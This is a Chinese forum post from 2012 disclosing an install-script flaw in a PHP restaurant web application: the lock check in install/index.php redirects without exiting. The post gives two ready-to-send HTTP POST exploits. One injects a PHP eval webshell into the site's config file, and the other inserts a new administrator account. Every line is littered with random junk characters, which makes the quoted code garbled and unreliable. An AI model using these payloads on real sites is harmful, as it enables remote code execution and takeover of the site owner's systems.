问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。
) G2 f: z7 L9 E- z( w( ]. v
; ?& Q3 o4 p" j7 \ i! \1 H<?php
( F+ h7 @" a. C2 y) \; G4 T. kif(file_exists("../install.lock"))
& J$ D4 L. g3 A1 |4 W{' f% g1 B! v" c! [' M. ~9 J9 w4 Q
header("Location: ../");//没有退出
3 ?, W3 n9 W& S" H}( D2 Y& @4 O5 m2 N0 e# E
8 j' d' a \/ l1 S$ E' N0 B
//echo 'tst';exit;) ^3 \' y' Q# Q" V. n
require_once("init.php");
J+ J; {4 x6 ]! Yif(empty($_REQUEST['step']) || $_REQUEST['step']==1)
$ Y( a! f2 y/ U' e{
2 q$ J% ~' B% e% I& J可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。' O) W# ~ h9 r) V% G- k& T5 {
" Z9 B" q* I) Q4 o; l# r1、getshell(很危险)( X( @3 R8 A0 e$ U4 ]
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)0 Z3 c% \6 {' Y0 a9 B2 y
{
( H% G& @- r/ c3 n! u8 w$smarty->assign("step",1);1 @9 P5 t5 a5 D/ j' D$ Q- O
$smarty->display("index.html");
1 z M% p: R2 w8 m( H1 E}elseif($_REQUEST['step']==2)
% q C$ I8 R/ Q8 V7 q{
5 e) d$ e* J7 C' X( t' a$ I $mysql_host=trim($_POST['mysql_host']);
7 T' a/ J; B3 m0 z $mysql_user=trim($_POST['mysql_user']);
3 ], I1 y6 z- [ w% n3 Z) t" u $mysql_pwd=trim($_POST['mysql_pwd']);
- U* l( }( U9 [* u" w+ V $mysql_db=trim($_POST['mysql_db']);
- n4 l% j) Y3 G+ `( ?/ P $tblpre=trim($_POST['tblpre']);
5 ?: g8 Y! o) R) b, G $domain==trim($_POST['domain']);/ Y/ }+ O. r9 K: B( U2 h( E
$str="<?php \r\n";
6 j8 s1 O. M4 i* j3 `2 c $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";: }" ~* |9 z% I+ ?8 U8 a @" M
$str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
- c3 B0 |: S, u/ D# j $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
- t$ e. W/ R- M1 }/ `5 D1 n# q- g $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";7 X# t5 C4 B* ?( j3 {
$str.='define("MYSQL_CHARSET","GBK");'."\r\n";
" ?" ]" K* i6 `6 f: n9 V3 M7 L $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
2 \$ i' D- m1 T$ s1 x! n $str.='define("DOMAIN","'.$domain.'");'."\r\n";
/ o- {7 \. B' c $str.='define("SKINS","default");'."\r\n";
3 V0 J* [% M1 x3 O3 J0 D" G/ i $str.='?>';2 O2 M: H. j/ m2 Q' A6 C
file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
. X" L3 j, m/ Z上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马
( d: X9 `4 D) o) L0 TPOST /canting/install/index.php?m=index&step=2 HTTP/1.1
# i0 J+ R* F: c2 VHost: 192.168.80.129' r3 @# [9 e1 `5 [/ x' X6 m- L) q# s
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
* f/ h' }: @9 E8 E4 B& S3 K% xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8. Y" p" h" Q- j0 X
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.38 i: e! I( ~8 L( m
Accept-Encoding: gzip, deflate
; e. N" ]. u' \" N4 P Y8 J- YReferer: http://192.168.80.129/canting/install/index.php?step=1- c& ?- M B, Q! ?
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42* h" s5 v4 Z4 ?3 b: D
Content-Type: application/x-www-form-urlencoded3 m0 A# g G( b Y* [- O
Content-Length: 1263 V$ G" u# D; ]5 b. M8 Y! q
# G* @+ z/ W4 r" W
mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD' `. L8 r: o! W: o% F4 A
但是这个方法很危险,将导致网站无法运行。9 G! H; m8 X; f# Z( q& q: ^
9 D0 v4 {7 l: W, k" N+ S2、直接添加管理员* Q [5 \, A! P W
, ~4 p( Z& [! B7 M
elseif($_REQUEST['step']==5)
. x5 X x3 ~ l: I{8 c# m" Z3 F ~5 ~! r; c
if($_POST)
! G; j U7 p7 i3 b) G3 _! l7 {! N1 w { require_once("../config/config.inc.php");
e( g, r2 N) w $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
0 U+ i1 E% l2 t mysql_select_db(MYSQL_DB,$link);+ [: i# Y1 _/ O2 X: r5 X
mysql_query("SET NAMES ".MYSQL_CHARSET );/ V8 _' J$ k8 B* V; ?
mysql_query("SET sql_mode=''");, B, t$ u) k3 q6 z& @( [
4 R1 X& t! j8 U# s5 v9 w+ I $adminname=trim($_POST['adminname']);
8 f# c" q8 x4 v $pwd1=trim($_POST['pwd1']);+ C w4 D2 @8 L0 C1 p) V
$pwd2=trim($_POST['pwd2']);
& s" W1 m k9 k* K$ X" k4 Q K if(empty($adminname))
) d Q2 I/ q5 J6 C% O% r% k! A {( ^' i: N6 R, J. Z$ F2 v
3 Z2 P: I& P# Q& }
echo "<script>alert('管理员不能为空');history.go(-1);</script>";
! { F0 l- W4 C0 ? exit();
5 d0 B0 @0 b& `8 Q, P }9 b# u0 L: |1 b( Q9 c/ Q
if(($pwd1!=$pwd2) or empty($pwd1))# [4 z: G% H7 b- S. J, g5 `0 O9 w
{
U7 Z6 L; P, }( F( c echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出
* R5 M% {7 Y, k& C5 H' _) J. V) W( L }
! P1 P1 M, L- k/ y, c9 h' @/ | mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员6 N# Y* p# q# F8 t+ s
} Y9 U" a9 g# u$ k I8 w/ {9 J! u
这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下: X8 @2 P6 w, O$ ^" c
POST /canting/install/index.php?m=index&step=5 HTTP/1.1
A! ]6 n& \: K2 q. tHost: 192.168.80.129
8 c) A- f T7 w2 x( ?; BUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
% Q$ \ ]9 n5 TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8; \4 y, h1 p3 v# |; ]
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.39 W' D, q7 t3 J9 y0 T' t
Accept-Encoding: gzip, deflate
: z+ e$ ^: L& O5 w! G! @) |5 xReferer: http://www.2cto.com /canting/install/index.php?step=1
2 t& X2 @. y) u6 G8 [) z8 zCookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
4 y& c9 ]9 H+ B9 ~( p) }5 NContent-Type: application/x-www-form-urlencoded4 o% j- o, x# k9 L
Content-Length: 46$ G* `& u4 T! M. c1 {7 X& h% |8 U
: R" W5 ]/ }; L* k0 r3 H; U
adminname=qingshen&pwd1=qingshen&pwd2=qingshen
- J, W, F; R) T* Q; {- c |
发表于 2012-12-4 11:13:44
收藏
支持
反对